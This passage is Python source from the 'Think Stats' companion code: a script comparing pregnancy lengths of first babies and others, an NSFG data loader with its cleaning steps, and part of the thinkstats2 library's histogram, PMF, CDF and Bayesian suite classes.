returns: DataFrames (all live births, first babies, others) """ preg = nsfg.ReadFemPreg() live = preg[preg.outcome == 1] firsts = live[live.birthord == 1] others = live[live.birthord != 1] assert len(live) == 9148 assert len(firsts) == 4413 assert len(others) == 4735 return live, firsts, others def Summarize(live, firsts, others): """Print various summary statistics.""" mean = live.prglngth.mean() var = live.prglngth.var() std = live.prglngth.std() print('Live mean', mean) print('Live variance', var) print('Live std', std) mean1 = firsts.prglngth.mean() mean2 = others.prglngth.mean() var1 = firsts.prglngth.var() var2 = others.prglngth.var() print('Mean') print('First babies', mean1) print('Others', mean2) print('Variance') print('First babies', var1) print('Others', var2) print('Difference in weeks', mean1 - mean2) print('Difference in hours', (mean1 - mean2) * 7 * 24) print('Difference relative to 39 weeks', (mean1 - mean2) / 39 * 100) d = thinkstats2.CohenEffectSize(firsts.prglngth, others.prglngth) print('Cohen d', d) def PrintExtremes(live): """Plots the histogram of pregnancy lengths and prints the extremes. live: DataFrame of live births """ hist = thinkstats2.Hist(live.prglngth) thinkplot.Hist(hist, label='live births') thinkplot.Save(root='first_nsfg_hist_live', title='Histogram', xlabel='weeks', ylabel='frequency') print('Shortest lengths:') for weeks, freq in hist.Smallest(10): print(weeks, freq) print('Longest lengths:') for weeks, freq in hist.Largest(10): print(weeks, freq) def MakeHists(live): """Plot Hists for live births live: DataFrame others: DataFrame """ hist = thinkstats2.Hist(live.birthwgt_lb, label='birthwgt_lb') thinkplot.Hist(hist) thinkplot.Save(root='first_wgt_lb_hist', xlabel='pounds', ylabel='frequency', axis=[-1, 14, 0, 3200]) hist = thinkstats2.Hist(live.birthwgt_oz, label='birthwgt_oz') thinkplot.Hist(hist) thinkplot.Save(root='first_wgt_oz_hist', xlabel='ounces', ylabel='frequency', axis=[-1, 16, 0, 1200]) hist = thinkstats2.Hist(np.floor(live.agepreg), label='agepreg') thinkplot.Hist(hist) thinkplot.Save(root='first_agepreg_hist', xlabel='years', ylabel='frequency') hist = thinkstats2.Hist(live.prglngth, label='prglngth') thinkplot.Hist(hist) thinkplot.Save(root='first_prglngth_hist', xlabel='weeks', ylabel='frequency', axis=[-1, 53, 0, 5000]) def MakeComparison(firsts, others): """Plots histograms of pregnancy length for first babies and others. firsts: DataFrame others: DataFrame """ first_hist = thinkstats2.Hist(firsts.prglngth, label='first') other_hist = thinkstats2.Hist(others.prglngth, label='other') width = 0.45 thinkplot.PrePlot(2) thinkplot.Hist(first_hist, align='right', width=width) thinkplot.Hist(other_hist, align='left', width=width) thinkplot.Save(root='first_nsfg_hist', title='Histogram', xlabel='weeks', ylabel='frequency', axis=[27, 46, 0, 2700]) def main(script): live, firsts, others = MakeFrames() MakeHists(live) PrintExtremes(live) MakeComparison(firsts, others) Summarize(live, firsts, others) if __name__ == '__main__': import sys main(*sys.argv) File: scipy/nsfg.py """This file contains code for use with "Think Stats", by Allen B. Downey, available from greenteapress.com Copyright 2010 Allen B. Downey License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html """ from __future__ import print_function from collections import defaultdict import numpy as np import sys import thinkstats2 def ReadFemPreg(dct_file='2002FemPreg.dct', dat_file='2002FemPreg.dat.gz'): """Reads the NSFG pregnancy data. 
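
    Illustrative usage sketch (not part of the original docstring; assumes
    the default dct/dat files are in the working directory):

        >>> df = ReadFemPreg()
        >>> len(df)
        13593
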
dct_file: string file name dat_file: string file name returns: DataFrame """ dct = thinkstats2.ReadStataDct(dct_file) df = dct.ReadFixedWidth(dat_file, compression='gzip') CleanFemPreg(df) return df def CleanFemPreg(df): """Recodes variables from the pregnancy frame. df: DataFrame """ # mother's age is encoded in centiyears; convert to years df.agepreg /= 100.0 # birthwgt_lb contains at least one bogus value (51 lbs) # replace with NaN df.birthwgt_lb[df.birthwgt_lb > 20] = np.nan # replace 'not ascertained', 'refused', 'don't know' with NaN na_vals = [97, 98, 99] df.birthwgt_lb.replace(na_vals, np.nan, inplace=True) df.birthwgt_oz.replace(na_vals, np.nan, inplace=True) df.hpagelb.replace(na_vals, np.nan, inplace=True) df.babysex.replace([7, 9], np.nan, inplace=True) df.nbrnaliv.replace([9], np.nan, inplace=True) # birthweight is stored in two columns, lbs and oz. # convert to a single column in lb # NOTE: creating a new column requires dictionary syntax, # not attribute assignment (like df.totalwgt_lb) df['totalwgt_lb'] = df.birthwgt_lb + df.birthwgt_oz / 16.0 # due to a bug in ReadStataDct, the last variable gets clipped; # so for now set it to NaN df.cmintvw = np.nan def MakePregMap(df): """Make a map from caseid to list of preg indices. df: DataFrame returns: dict that maps from caseid to list of indices into preg df """ d = defaultdict(list) for index, caseid in df.caseid.iteritems(): d[caseid].append(index) return d def main(script): """Tests the functions in this module. script: string script name """ df = ReadFemPreg() print(df.shape) assert len(df) == 13593 assert df.caseid[13592] == 12571 assert df.pregordr.value_counts()[1] == 5033 assert df.nbrnaliv.value_counts()[1] == 8981 assert df.babysex.value_counts()[1] == 4641 assert df.birthwgt_lb.value_counts()[7] == 3049 assert df.birthwgt_oz.value_counts()[0] == 1037 assert df.prglngth.value_counts()[39] == 4744 assert df.outcome.value_counts()[1] == 9148 assert df.birthord.value_counts()[1] == 4413 assert df.agepreg.value_counts()[22.75] == 100 assert df.totalwgt_lb.value_counts()[7.5] == 302 weights = df.finalwgt.value_counts() key = max(weights.keys()) assert df.finalwgt.value_counts()[key] == 6 print('%s: All tests passed.' % script) if __name__ == '__main__': main(*sys.argv) File: scipy/thinkstats2.py """This file contains code for use with "Think Stats" and "Think Bayes", both by Allen B. Downey, available from greenteapress.com Copyright 2014 Allen B. Downey License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html """ from __future__ import print_function, division """This file contains class definitions for: Hist: represents a histogram (map from values to integer frequencies). Pmf: represents a probability mass function (map from values to probs). _DictWrapper: private parent class for Hist and Pmf. Cdf: represents a discrete cumulative distribution function Pdf: represents a continuous probability density function """ import bisect import copy import logging import math import random import re from collections import Counter from operator import itemgetter import thinkplot import numpy as np import pandas import scipy from scipy import stats from scipy import special from scipy import ndimage from io import open ROOT2 = math.sqrt(2) def RandomSeed(x): """Initialize the random and np.random generators. x: int seed """ random.seed(x) np.random.seed(x) def Odds(p): """Computes odds for a given probability. Example: p=0.75 means 75 for and 25 against, or 3:1 odds in favor. 
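
    Illustrative example (not part of the original docstring):

        >>> Odds(0.75)
        3.0
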
Note: when p=1, the formula for odds divides by zero, which is normally undefined. But I think it is reasonable to define Odds(1) to be infinity, so that's what this function does. p: float 0-1 Returns: float odds """ if p == 1: return float('inf') return p / (1 - p) def Probability(o): """Computes the probability corresponding to given odds. Example: o=2 means 2:1 odds in favor, or 2/3 probability o: float odds, strictly positive Returns: float probability """ return o / (o + 1) def Probability2(yes, no): """Computes the probability corresponding to given odds. Example: yes=2, no=1 means 2:1 odds in favor, or 2/3 probability. yes, no: int or float odds in favor """ return yes / (yes + no) class Interpolator(object): """Represents a mapping between sorted sequences; performs linear interp. Attributes: xs: sorted list ys: sorted list """ def __init__(self, xs, ys): self.xs = xs self.ys = ys def Lookup(self, x): """Looks up x and returns the corresponding value of y.""" return self._Bisect(x, self.xs, self.ys) def Reverse(self, y): """Looks up y and returns the corresponding value of x.""" return self._Bisect(y, self.ys, self.xs) def _Bisect(self, x, xs, ys): """Helper function.""" if x <= xs[0]: return ys[0] if x >= xs[-1]: return ys[-1] i = bisect.bisect(xs, x) frac = 1.0 * (x - xs[i - 1]) / (xs[i] - xs[i - 1]) y = ys[i - 1] + frac * 1.0 * (ys[i] - ys[i - 1]) return y class _DictWrapper(object): """An object that contains a dictionary.""" def __init__(self, obj=None, label=None): """Initializes the distribution. obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs label: string label """ self.label = label if label is not None else '_nolegend_' self.d = {} # flag whether the distribution is under a log transform self.log = False if obj is None: return if isinstance(obj, (_DictWrapper, Cdf, Pdf)): self.label = label if label is not None else obj.label if isinstance(obj, dict): self.d.update(obj.items()) elif isinstance(obj, (_DictWrapper, Cdf, Pdf)): self.d.update(obj.Items()) elif isinstance(obj, pandas.Series): self.d.update(obj.value_counts().iteritems()) else: # finally, treat it like a list self.d.update(Counter(obj)) if len(self) > 0 and isinstance(self, Pmf): self.Normalize() def __hash__(self): return id(self) def __str__(self): cls = self.__class__.__name__ return '%s(%s)' % (cls, str(self.d)) __repr__ = __str__ def __eq__(self, other): return self.d == other.d def __len__(self): return len(self.d) def __iter__(self): return iter(self.d) def iterkeys(self): """Returns an iterator over keys.""" return iter(self.d) def __contains__(self, value): return value in self.d def __getitem__(self, value): return self.d.get(value, 0) def __setitem__(self, value, prob): self.d[value] = prob def __delitem__(self, value): del self.d[value] def Copy(self, label=None): """Returns a copy. Make a shallow copy of d. If you want a deep copy of d, use copy.deepcopy on the whole object. label: string label for the new Hist returns: new _DictWrapper with the same type """ new = copy.copy(self) new.d = copy.copy(self.d) new.label = label if label is not None else self.label return new def Scale(self, factor): """Multiplies the values by a factor. factor: what to multiply by Returns: new object """ new = self.Copy() new.d.clear() for val, prob in self.Items(): new.Set(val * factor, prob) return new def Log(self, m=None): """Log transforms the probabilities. Removes values with probability 0. Normalizes so that the largest logprob is 0. 
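
        Illustrative usage sketch (not part of the original docstring):

            >>> pmf = Pmf([1, 1, 2, 2])
            >>> pmf.Log()
            >>> pmf[1]
            0.0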
""" if self.log: raise ValueError("Pmf/Hist already under a log transform") self.log = True if m is None: m = self.MaxLike() for x, p in self.d.items(): if p: self.Set(x, math.log(p / m)) else: self.Remove(x) def Exp(self, m=None): """Exponentiates the probabilities. m: how much to shift the ps before exponentiating If m is None, normalizes so that the largest prob is 1. """ if not self.log: raise ValueError("Pmf/Hist not under a log transform") self.log = False if m is None: m = self.MaxLike() for x, p in self.d.items(): self.Set(x, math.exp(p - m)) def GetDict(self): """Gets the dictionary.""" return self.d def SetDict(self, d): """Sets the dictionary.""" self.d = d def Values(self): """Gets an unsorted sequence of values. Note: one source of confusion is that the keys of this dictionary are the values of the Hist/Pmf, and the values of the dictionary are frequencies/probabilities. """ return self.d.keys() def Items(self): """Gets an unsorted sequence of (value, freq/prob) pairs.""" return self.d.items() def Render(self, **options): """Generates a sequence of points suitable for plotting. Note: options are ignored Returns: tuple of (sorted value sequence, freq/prob sequence) """ if min(self.d.keys()) is np.nan: logging.warning('Hist: contains NaN, may not render correctly.') return zip(*sorted(self.Items())) def MakeCdf(self, label=None): """Makes a Cdf.""" label = label if label is not None else self.label return Cdf(self, label=label) def Print(self): """Prints the values and freqs/probs in ascending order.""" for val, prob in sorted(self.d.items()): print(val, prob) def Set(self, x, y=0): """Sets the freq/prob associated with the value x. Args: x: number value y: number freq or prob """ self.d[x] = y def Incr(self, x, term=1): """Increments the freq/prob associated with the value x. Args: x: number value term: how much to increment by """ self.d[x] = self.d.get(x, 0) + term def Mult(self, x, factor): """Scales the freq/prob associated with the value x. Args: x: number value factor: how much to multiply by """ self.d[x] = self.d.get(x, 0) * factor def Remove(self, x): """Removes a value. Throws an exception if the value is not there. Args: x: value to remove """ del self.d[x] def Total(self): """Returns the total of the frequencies/probabilities in the map.""" total = sum(self.d.values()) return total def MaxLike(self): """Returns the largest frequency/probability in the map.""" return max(self.d.values()) def Largest(self, n=10): """Returns the largest n values, with frequency/probability. n: number of items to return """ return sorted(self.d.items(), reverse=True)[:n] def Smallest(self, n=10): """Returns the smallest n values, with frequency/probability. n: number of items to return """ return sorted(self.d.items(), reverse=False)[:n] class Hist(_DictWrapper): """Represents a histogram, which is a map from values to frequencies. Values can be any hashable type; frequencies are integer counters. """ def Freq(self, x): """Gets the frequency associated with the value x. 
Args: x: number value Returns: int frequency """ return self.d.get(x, 0) def Freqs(self, xs): """Gets frequencies for a sequence of values.""" return [self.Freq(x) for x in xs] def IsSubset(self, other): """Checks whether the values in this histogram are a subset of the values in the given histogram.""" for val, freq in self.Items(): if freq > other.Freq(val): return False return True def Subtract(self, other): """Subtracts the values in the given histogram from this histogram.""" for val, freq in other.Items(): self.Incr(val, -freq) class Pmf(_DictWrapper): """Represents a probability mass function. Values can be any hashable type; probabilities are floating-point. Pmfs are not necessarily normalized. """ def Prob(self, x, default=0): """Gets the probability associated with the value x. Args: x: number value default: value to return if the key is not there Returns: float probability """ return self.d.get(x, default) def Probs(self, xs): """Gets probabilities for a sequence of values.""" return [self.Prob(x) for x in xs] def Percentile(self, percentage): """Computes a percentile of a given Pmf. Note: this is not super efficient. If you are planning to compute more than a few percentiles, compute the Cdf. percentage: float 0-100 returns: value from the Pmf """ p = percentage / 100.0 total = 0 for val, prob in sorted(self.Items()): total += prob if total >= p: return val def ProbGreater(self, x): """Probability that a sample from this Pmf exceeds x. x: number returns: float probability """ if isinstance(x, _DictWrapper): return PmfProbGreater(self, x) else: t = [prob for (val, prob) in self.d.items() if val > x] return sum(t) def ProbLess(self, x): """Probability that a sample from this Pmf is less than x. x: number returns: float probability """ if isinstance(x, _DictWrapper): return PmfProbLess(self, x) else: t = [prob for (val, prob) in self.d.items() if val < x] return sum(t) def __lt__(self, obj): """Less than. obj: number or _DictWrapper returns: float probability """ return self.ProbLess(obj) def __gt__(self, obj): """Greater than. obj: number or _DictWrapper returns: float probability """ return self.ProbGreater(obj) def __ge__(self, obj): """Greater than or equal. obj: number or _DictWrapper returns: float probability """ return 1 - (self < obj) def __le__(self, obj): """Less than or equal. obj: number or _DictWrapper returns: float probability """ return 1 - (self > obj) def Normalize(self, fraction=1.0): """Normalizes this PMF so the sum of all probs is fraction. Args: fraction: what the total should be after normalization Returns: the total probability before normalizing """ if self.log: raise ValueError("Normalize: Pmf is under a log transform") total = self.Total() if total == 0.0: raise ValueError('Normalize: total probability is zero.') #logging.warning('Normalize: total probability is zero.') #return total factor = fraction / total for x in self.d: self.d[x] *= factor return total def Random(self): """Chooses a random element from this PMF. Note: this is not very efficient. If you plan to call this more than a few times, consider converting to a CDF. Returns: float value from the Pmf """ target = random.random() total = 0.0 for x, p in self.d.items(): total += p if total >= target: return x # we shouldn't get here raise ValueError('Random: Pmf might not be normalized.') def Mean(self): """Computes the mean of a PMF. Returns: float mean """ mean = 0.0 for x, p in self.d.items(): mean += p * x return mean def Var(self, mu=None): """Computes the variance of a PMF. 
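
        Illustrative example (not part of the original docstring):

            >>> pmf = Pmf([1, 2, 3, 4])
            >>> pmf.Mean()
            2.5
            >>> pmf.Var()
            1.25
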
mu: the point around which the variance is computed; if omitted, computes the mean returns: float variance """ if mu is None: mu = self.Mean() var = 0.0 for x, p in self.d.items(): var += p * (x - mu) ** 2 return var def Std(self, mu=None): """Computes the standard deviation of a PMF. mu: the point around which the variance is computed; if omitted, computes the mean returns: float standard deviation """ var = self.Var(mu) return math.sqrt(var) def MaximumLikelihood(self): """Returns the value with the highest probability. Returns: float probability """ _, val = max((prob, val) for val, prob in self.Items()) return val def CredibleInterval(self, percentage=90): """Computes the central credible interval. If percentage=90, computes the 90% CI. Args: percentage: float between 0 and 100 Returns: sequence of two floats, low and high """ cdf = self.MakeCdf() return cdf.CredibleInterval(percentage) def __add__(self, other): """Computes the Pmf of the sum of values drawn from self and other. other: another Pmf or a scalar returns: new Pmf """ try: return self.AddPmf(other) except AttributeError: return self.AddConstant(other) def AddPmf(self, other): """Computes the Pmf of the sum of values drawn from self and other. other: another Pmf returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): for v2, p2 in other.Items(): pmf.Incr(v1 + v2, p1 * p2) return pmf def AddConstant(self, other): """Computes the Pmf of the sum a constant and values from self. other: a number returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): pmf.Set(v1 + other, p1) return pmf def __sub__(self, other): """Computes the Pmf of the diff of values drawn from self and other. other: another Pmf returns: new Pmf """ try: return self.SubPmf(other) except AttributeError: return self.AddConstant(-other) def SubPmf(self, other): """Computes the Pmf of the diff of values drawn from self and other. other: another Pmf returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): for v2, p2 in other.Items(): pmf.Incr(v1 - v2, p1 * p2) return pmf def __mul__(self, other): """Computes the Pmf of the product of values drawn from self and other. other: another Pmf returns: new Pmf """ try: return self.MulPmf(other) except AttributeError: return self.MulConstant(other) def MulPmf(self, other): """Computes the Pmf of the diff of values drawn from self and other. other: another Pmf returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): for v2, p2 in other.Items(): pmf.Incr(v1 * v2, p1 * p2) return pmf def MulConstant(self, other): """Computes the Pmf of the product of a constant and values from self. other: a number returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): pmf.Set(v1 * other, p1) return pmf def __div__(self, other): """Computes the Pmf of the ratio of values drawn from self and other. other: another Pmf returns: new Pmf """ try: return self.DivPmf(other) except AttributeError: return self.MulConstant(1/other) __truediv__ = __div__ def DivPmf(self, other): """Computes the Pmf of the ratio of values drawn from self and other. other: another Pmf returns: new Pmf """ pmf = Pmf() for v1, p1 in self.Items(): for v2, p2 in other.Items(): pmf.Incr(v1 / v2, p1 * p2) return pmf def Max(self, k): """Computes the CDF of the maximum of k selections from this dist. k: int returns: new Cdf """ cdf = self.MakeCdf() return cdf.Max(k) class Joint(Pmf): """Represents a joint distribution. The values are sequences (usually tuples) """ def Marginal(self, i, label=None): """Gets the marginal distribution of the indicated variable. 
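
        Illustrative example (not part of the original docstring):

            >>> joint = Joint()
            >>> for pair in [(0, 0), (0, 1), (1, 0), (1, 1)]:
            ...     joint.Set(pair, 0.25)
            >>> joint.Marginal(0).Prob(0)
            0.5
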
i: index of the variable we want Returns: Pmf """ pmf = Pmf(label=label) for vs, prob in self.Items(): pmf.Incr(vs[i], prob) return pmf def Conditional(self, i, j, val, label=None): """Gets the conditional distribution of the indicated variable. Distribution of vs[i], conditioned on vs[j] = val. i: index of the variable we want j: which variable is conditioned on val: the value the jth variable has to have Returns: Pmf """ pmf = Pmf(label=label) for vs, prob in self.Items(): if vs[j] != val: continue pmf.Incr(vs[i], prob) pmf.Normalize() return pmf def MaxLikeInterval(self, percentage=90): """Returns the maximum-likelihood credible interval. If percentage=90, computes a 90% CI containing the values with the highest likelihoods. percentage: float between 0 and 100 Returns: list of values from the suite """ interval = [] total = 0 t = [(prob, val) for val, prob in self.Items()] t.sort(reverse=True) for prob, val in t: interval.append(val) total += prob if total >= percentage / 100.0: break return interval def MakeJoint(pmf1, pmf2): """Joint distribution of values from pmf1 and pmf2. Assumes that the PMFs represent independent random variables. Args: pmf1: Pmf object pmf2: Pmf object Returns: Joint pmf of value pairs """ joint = Joint() for v1, p1 in pmf1.Items(): for v2, p2 in pmf2.Items(): joint.Set((v1, v2), p1 * p2) return joint def MakeHistFromList(t, label=None): """Makes a histogram from an unsorted sequence of values. Args: t: sequence of numbers label: string label for this histogram Returns: Hist object """ return Hist(t, label=label) def MakeHistFromDict(d, label=None): """Makes a histogram from a map from values to frequencies. Args: d: dictionary that maps values to frequencies label: string label for this histogram Returns: Hist object """ return Hist(d, label) def MakePmfFromList(t, label=None): """Makes a PMF from an unsorted sequence of values. Args: t: sequence of numbers label: string label for this PMF Returns: Pmf object """ return Pmf(t, label=label) def MakePmfFromDict(d, label=None): """Makes a PMF from a map from values to probabilities. Args: d: dictionary that maps values to probabilities label: string label for this PMF Returns: Pmf object """ return Pmf(d, label=label) def MakePmfFromItems(t, label=None): """Makes a PMF from a sequence of value-probability pairs Args: t: sequence of value-probability pairs label: string label for this PMF Returns: Pmf object """ return Pmf(dict(t), label=label) def MakePmfFromHist(hist, label=None): """Makes a normalized PMF from a Hist object. Args: hist: Hist object label: string label Returns: Pmf object """ if label is None: label = hist.label return Pmf(hist, label=label) def MakeMixture(metapmf, label='mix'): """Make a mixture distribution. Args: metapmf: Pmf that maps from Pmfs to probs. label: string label for the new Pmf. Returns: Pmf object. """ mix = Pmf(label=label) for pmf, p1 in metapmf.Items(): for x, p2 in pmf.Items(): mix.Incr(x, p1 * p2) return mix def MakeUniformPmf(low, high, n): """Make a uniform Pmf. low: lowest value (inclusive) high: highest value (inclusize) n: number of values """ pmf = Pmf() for x in np.linspace(low, high, n): pmf.Set(x, 1) pmf.Normalize() return pmf class Cdf(object): """Represents a cumulative distribution function. Attributes: xs: sequence of values ps: sequence of probabilities label: string used as a graph label. """ def __init__(self, obj=None, ps=None, label=None): """Initializes. If ps is provided, obj must be the corresponding list of values. 
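
        Illustrative example (not part of the original docstring):

            >>> cdf = Cdf([1, 2, 2, 5])
            >>> float(cdf.Prob(2))
            0.75
            >>> int(cdf.Value(0.5))
            2
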
obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs ps: list of cumulative probabilities label: string label """ self.label = label if label is not None else '_nolegend_' if isinstance(obj, (_DictWrapper, Cdf, Pdf)): if not label: self.label = label if label is not None else obj.label if obj is None: # caller does not provide obj, make an empty Cdf self.xs = np.asarray([]) self.ps = np.asarray([]) if ps is not None: logging.warning("Cdf: can't pass ps without also passing xs.") return else: # if the caller provides xs and ps, just store them if ps is not None: if isinstance(ps, str): logging.warning("Cdf: ps can't be a string") self.xs = np.asarray(obj) self.ps = np.asarray(ps) return # caller has provided just obj, not ps if isinstance(obj, Cdf): self.xs = copy.copy(obj.xs) self.ps = copy.copy(obj.ps) return if isinstance(obj, _DictWrapper): dw = obj else: dw = Hist(obj) if len(dw) == 0: self.xs = np.asarray([]) self.ps = np.asarray([]) return xs, freqs = zip(*sorted(dw.Items())) self.xs = np.asarray(xs) self.ps = np.cumsum(freqs, dtype=np.float) self.ps /= self.ps[-1] def __str__(self): return 'Cdf(%s, %s)' % (str(self.xs), str(self.ps)) __repr__ = __str__ def __len__(self): return len(self.xs) def __getitem__(self, x): return self.Prob(x) def __setitem__(self): raise UnimplementedMethodException() def __delitem__(self): raise UnimplementedMethodException() def __eq__(self, other): return np.all(self.xs == other.xs) and np.all(self.ps == other.ps) def Copy(self, label=None): """Returns a copy of this Cdf. label: string label for the new Cdf """ if label is None: label = self.label return Cdf(list(self.xs), list(self.ps), label=label) def MakePmf(self, label=None): """Makes a Pmf.""" if label is None: label = self.label return Pmf(self, label=label) def Values(self): """Returns a sorted list of values. """ return self.xs def Items(self): """Returns a sorted sequence of (value, probability) pairs. Note: in Python3, returns an iterator. """ a = self.ps b = np.roll(a, 1) b[0] = 0 return zip(self.xs, a-b) def Shift(self, term): """Adds a term to the xs. term: how much to add """ new = self.Copy() # don't use +=, or else an int array + float yields int array new.xs = new.xs + term return new def Scale(self, factor): """Multiplies the xs by a factor. factor: what to multiply by """ new = self.Copy() # don't use *=, or else an int array * float yields int array new.xs = new.xs * factor return new def Prob(self, x): """Returns CDF(x), the probability that corresponds to value x. Args: x: number Returns: float probability """ if x < self.xs[0]: return 0.0 index = bisect.bisect(self.xs, x) p = self.ps[index-1] return p def Probs(self, xs): """Gets probabilities for a sequence of values. xs: any sequence that can be converted to NumPy array returns: NumPy array of cumulative probabilities """ xs = np.asarray(xs) index = np.searchsorted(self.xs, xs, side='right') ps = self.ps[index-1] ps[xs < self.xs[0]] = 0.0 return ps ProbArray = Probs def Value(self, p): """Returns InverseCDF(p), the value that corresponds to probability p. Args: p: number in the range [0, 1] Returns: number value """ if p < 0 or p > 1: raise ValueError('Probability p must be in range [0, 1]') index = bisect.bisect_left(self.ps, p) return self.xs[index] def ValueArray(self, ps): """Returns InverseCDF(p), the value that corresponds to probability p. 
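
        Illustrative example (not part of the original docstring):

            >>> cdf = Cdf([1, 2, 3, 4])
            >>> cdf.ValueArray([0.25, 0.5, 1.0]).tolist()
            [1, 2, 4]
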
Args: ps: NumPy array of numbers in the range [0, 1] Returns: NumPy array of values """ ps = np.asarray(ps) if np.any(ps < 0) or np.any(ps > 1): raise ValueError('Probability p must be in range [0, 1]') index = np.searchsorted(self.ps, ps, side='left') return self.xs[index] def Percentile(self, p): """Returns the value that corresponds to percentile p. Args: p: number in the range [0, 100] Returns: number value """ return self.Value(p / 100.0) def PercentileRank(self, x): """Returns the percentile rank of the value x. x: potential value in the CDF returns: percentile rank in the range 0 to 100 """ return self.Prob(x) * 100.0 def Random(self): """Chooses a random value from this distribution.""" return self.Value(random.random()) def Sample(self, n): """Generates a random sample from this distribution. n: int length of the sample returns: NumPy array """ ps = np.random.random(n) return self.ValueArray(ps) def Mean(self): """Computes the mean of a CDF. Returns: float mean """ old_p = 0 total = 0.0 for x, new_p in zip(self.xs, self.ps): p = new_p - old_p total += p * x old_p = new_p return total def CredibleInterval(self, percentage=90): """Computes the central credible interval. If percentage=90, computes the 90% CI. Args: percentage: float between 0 and 100 Returns: sequence of two floats, low and high """ prob = (1 - percentage / 100.0) / 2 interval = self.Value(prob), self.Value(1 - prob) return interval ConfidenceInterval = CredibleInterval def _Round(self, multiplier=1000.0): """ An entry is added to the cdf only if the percentile differs from the previous value in a significant digit, where the number of significant digits is determined by multiplier. The default is 1000, which keeps log10(1000) = 3 significant digits. """ # TODO(write this method) raise UnimplementedMethodException() def Render(self, **options): """Generates a sequence of points suitable for plotting. An empirical CDF is a step function; linear interpolation can be misleading. Note: options are ignored Returns: tuple of (xs, ps) """ def interleave(a, b): c = np.empty(a.shape[0] + b.shape[0]) c[::2] = a c[1::2] = b return c a = np.array(self.xs) xs = interleave(a, a) shift_ps = np.roll(self.ps, 1) shift_ps[0] = 0 ps = interleave(shift_ps, self.ps) return xs, ps def Max(self, k): """Computes the CDF of the maximum of k selections from this dist. k: int returns: new Cdf """ cdf = self.Copy() cdf.ps **= k return cdf def MakeCdfFromItems(items, label=None): """Makes a cdf from an unsorted sequence of (value, frequency) pairs. Args: items: unsorted sequence of (value, frequency) pairs label: string label for this CDF Returns: cdf: list of (value, fraction) pairs """ return Cdf(dict(items), label=label) def MakeCdfFromDict(d, label=None): """Makes a CDF from a dictionary that maps values to frequencies. Args: d: dictionary that maps values to frequencies. label: string label for the data. Returns: Cdf object """ return Cdf(d, label=label) def MakeCdfFromList(seq, label=None): """Creates a CDF from an unsorted sequence. Args: seq: unsorted sequence of sortable values label: string label for the cdf Returns: Cdf object """ return Cdf(seq, label=label) def MakeCdfFromHist(hist, label=None): """Makes a CDF from a Hist object. Args: hist: Pmf.Hist object label: string label for the data. Returns: Cdf object """ if label is None: label = hist.label return Cdf(hist, label=label) def MakeCdfFromPmf(pmf, label=None): """Makes a CDF from a Pmf object. Args: pmf: Pmf.Pmf object label: string label for the data. 
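
    Illustrative example (not part of the original docstring):

        >>> pmf = Pmf({1: 0.2, 2: 0.3, 3: 0.5})
        >>> cdf = MakeCdfFromPmf(pmf)
        >>> float(cdf.Prob(2))
        0.5
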
Returns: Cdf object """ if label is None: label = pmf.label return Cdf(pmf, label=label) class UnimplementedMethodException(Exception): """Exception if someone calls a method that should be overridden.""" class Suite(Pmf): """Represents a suite of hypotheses and their probabilities.""" def Update(self, data): """Updates each hypothesis based on the data. data: any representation of the data returns: the normalizing constant """ for hypo in self.Values(): like = self.Likelihood(data, hypo) self.Mult(hypo, like) return self.Normalize() def LogUpdate(self, data): """Updates a suite of hypotheses based on new data. Modifies the suite directly; if you want to keep the original, make a copy. Note: unlike Update, LogUpdate does not normalize. Args: data: any representation of the data """ for hypo in self.Values(): like = self.LogLikelihood(data, hypo) self.Incr(hypo, like) def UpdateSet(self, dataset): """Updates each hypothesis based on the dataset. This is more efficient than calling Update repeatedly because it waits until the end to Normalize. Modifies the suite directly; if you want to keep the original, make a copy. dataset: a sequence of data returns: the normalizing constant """ for data in dataset: for hypo in self.Values(): like = self.Likelihood(data, hypo) self.Mult(hypo, like) return self.Normalize() def LogUpdateSet(self, dataset): """Updates each hypothesis based on the dataset. Modifies the suite directly; if you want to keep the original, make a copy. dataset: a sequence of data returns: None """ for data in dataset: self.LogUpdate(data) def Likelihood(self, data, hypo): """Computes the likelihood of the data under the hypothesis. hypo: some representation of the hypothesis data: some representation of the data """ raise UnimplementedMethodException() def LogLikelihood(self, data, hypo): """Computes the log likelihood of the data under the hypothesis. hypo: some representation of the hypothesis data: some representation of the data """ raise UnimplementedMethodException() def Print(self): """Prints the hypotheses and their probabilities.""" for hypo, prob in sorted(self.Items()): print(hypo, prob) def MakeOdds(self): """Transforms from probabilities to odds. Values with prob=0 are removed. """ for hypo, prob in self.Items(): if prob: self.Set(hypo, Odds(prob)) else: self.Remove(hypo) def MakeProbs(self): """Transforms from odds to probabilities.""" for hypo, odds in self.Items(): self.Set(hypo, Probability(odds)) def MakeSuiteFromList(t, label=None): """Makes a suite from an unsorted sequence of values. Args: t: sequence of numbers label: string label for this suite Returns: Suite object """ hist = MakeHistFromList(t, label=label) d = hist.GetDict() return MakeSuiteFromDict(d) def MakeSuiteFromHist(hist, label=None): """Makes a normalized suite from a Hist object. Args: hist: Hist object label: string label Returns: Suite object """ if label is None: label = hist.label # make a copy of the dictionary d = dict(hist.GetDict()) return MakeSuiteFromDict(d, label) def MakeSuiteFromDict(d, label=None): """Makes a suite from a map from values to probabilities. Args: d: dictionary that maps values to probabilities label: string label for this suite Returns: Suite object """ suite = Suite(label=label) suite.SetDict(d) suite.Normalize() return suite class Pdf(object): """Represents a probability density function (PDF).""" def Density(self, x): """Evaluates this Pdf at x. 
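
        Illustrative example using a concrete subclass (not part of the
        original docstring):

            >>> pdf = NormalPdf(mu=0, sigma=1)
            >>> round(float(pdf.Density(0)), 4)
            0.3989
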
